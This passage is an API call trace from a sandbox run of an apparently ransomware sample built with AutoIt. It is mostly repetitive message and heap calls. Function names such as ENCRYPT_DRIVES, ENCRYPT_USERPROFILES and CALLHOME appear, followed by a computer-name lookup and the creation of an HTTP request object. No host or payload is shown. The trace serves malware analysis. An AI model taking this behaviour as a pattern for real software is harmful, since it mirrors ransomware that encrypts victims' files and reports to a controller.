(in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.650] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.651] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.651] GetLastError () returned 0x6 [0257.651] SetLastError (dwErrCode=0x6) [0257.651] GetLastError () returned 0x6 [0257.651] SetLastError (dwErrCode=0x6) [0257.651] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc04290, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0) returned 0 [0257.652] GetLastError () returned 0x6 [0257.652] GetLastError () returned 0x6 [0257.652] SetLastError (dwErrCode=0x6) [0257.652] GetLastError () returned 0x6 [0257.652] SetLastError (dwErrCode=0x6) [0257.652] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.652] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.652] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc052b0 | out: hHeap=0xbc0000) returned 1 [0257.652] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.652] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda690 | out: hHeap=0xbc0000) returned 1 [0257.652] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.652] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.652] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.652] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.652] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.652] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.652] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0257.652] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe078 | out: hHeap=0xbc0000) returned 1 [0257.652] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.652] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.653] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.653] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.653] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.653] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.653] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.653] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.653] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.653] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.661] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.661] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.661] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.661] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.661] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.661] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.661] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.661] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.661] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.662] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.663] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.664] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.664] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.664] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.664] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.664] GetLastError () returned 0x6 [0257.664] SetLastError (dwErrCode=0x6) [0257.664] GetLastError () returned 0x6 [0257.664] SetLastError (dwErrCode=0x6) [0257.664] WriteFile (in: hFile=0xfffffffe, lpBuffer=0xc04290, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x7de0c8, lpOverlapped=0x0) returned 0 [0257.664] GetLastError () returned 0x6 [0257.664] GetLastError () returned 0x6 [0257.664] SetLastError (dwErrCode=0x6) [0257.664] GetLastError () returned 0x6 [0257.664] SetLastError (dwErrCode=0x6) [0257.664] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.664] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018d8 | out: hHeap=0xbc0000) returned 1 [0257.664] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc052b0 | out: hHeap=0xbc0000) returned 1 [0257.665] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.665] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0257.665] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.665] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.666] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0257.666] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.666] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.666] CharUpperBuffW (in: lpsz="ENCRYPT_DRIVES", cchLength=0xe | out: lpsz="ENCRYPT_DRIVES") returned 0xe [0257.666] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.666] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.666] CharUpperBuffW (in: lpsz="DECRYPT_DRIVES", cchLength=0xe | out: lpsz="DECRYPT_DRIVES") returned 0xe [0257.666] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe050 | out: hHeap=0xbc0000) returned 1 [0257.666] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.666] CharUpperBuffW (in: lpsz="ENCRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="ENCRYPT_USERPROFILES") returned 0x14 [0257.666] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.666] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.666] CharUpperBuffW (in: lpsz="DECRYPT_USERPROFILES", cchLength=0x14 | out: lpsz="DECRYPT_USERPROFILES") returned 0x14 [0257.666] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdf350 | out: hHeap=0xbc0000) returned 1 [0257.666] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01988 | out: hHeap=0xbc0000) returned 1 [0257.666] CharUpperBuffW (in: lpsz="CALLHOME", cchLength=0x8 | out: lpsz="CALLHOME") returned 0x8 [0257.666] GetComputerNameW (in: lpBuffer=0x7df4b0, nSize=0x7df7cc | out: lpBuffer="XDUWTFONO", nSize=0x7df7cc) returned 1 [0257.667] CharUpperBuffW (in: lpsz="AutoIt.Error", cchLength=0xc | out: lpsz="AUTOIT.ERROR") returned 0xc [0257.667] CharUpperBuffW (in: lpsz="MyErrFunc", cchLength=0x9 | out: lpsz="MYERRFUNC") returned 0x9 [0257.667] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe280 [0257.667] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.667] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.667] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bc8 [0257.668] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6a8 [0257.668] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda660 [0257.668] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda678 [0257.668] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dd8 [0257.668] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.668] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb048 [0257.668] CoInitialize (pvReserved=0x0) returned 0x1 [0257.669] CoUninitialize () [0257.669] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x3c) returned 0xbfb120 [0257.669] CLSIDFromProgID (in: lpszProgID="winhttp.winhttprequest.5.1", lpclsid=0xbfb138 | out: lpclsid=0xbfb138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95))) returned 0x0 [0257.674] CoCreateInstance (in: rclsid=0xbfb138*(Data1=0x2087c2f4, Data2=0x2cef, Data3=0x4953, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x77, [4]=0x9b, [5]=0x67, [6]=0x4, [7]=0x95)), pUnkOuter=0x0, dwClsContext=0x5, riid=0xbfb148*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x7df778 | out: ppv=0x7df778*=0xc02980) returned 0x0 [0257.685] WinHttpRequest:IUnknown:QueryInterface (in: This=0xc02980, riid=0x322c9c*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x7df748 | out: ppvObject=0x7df748*=0x0) returned 0x80004002 [0257.685] WinHttpRequest:IUnknown:QueryInterface (in: This=0xc02980, riid=0x322c4c*(Data1=0x10a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7df748 | out: ppvObject=0x7df748*=0x0) returned 0x80004002 [0257.685] WinHttpRequest:IUnknown:QueryInterface (in: This=0xc02980, riid=0x322c0c*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xbfb128 | out: ppvObject=0xbfb128*=0xc02980) returned 0x0 [0257.685] WinHttpRequest:IUnknown:Release (This=0xc02980) returned 0x1 [0257.685] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda510 [0257.685] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda498 [0257.685] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda498 | out: hHeap=0xbc0000) returned 1 [0257.686] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9af0 | out: hHeap=0xbc0000) returned 1 [0257.686] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda630 | out: hHeap=0xbc0000) returned 1 [0257.686] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe258 | out: hHeap=0xbc0000) returned 1 [0257.686] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.686] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe258 [0257.686] 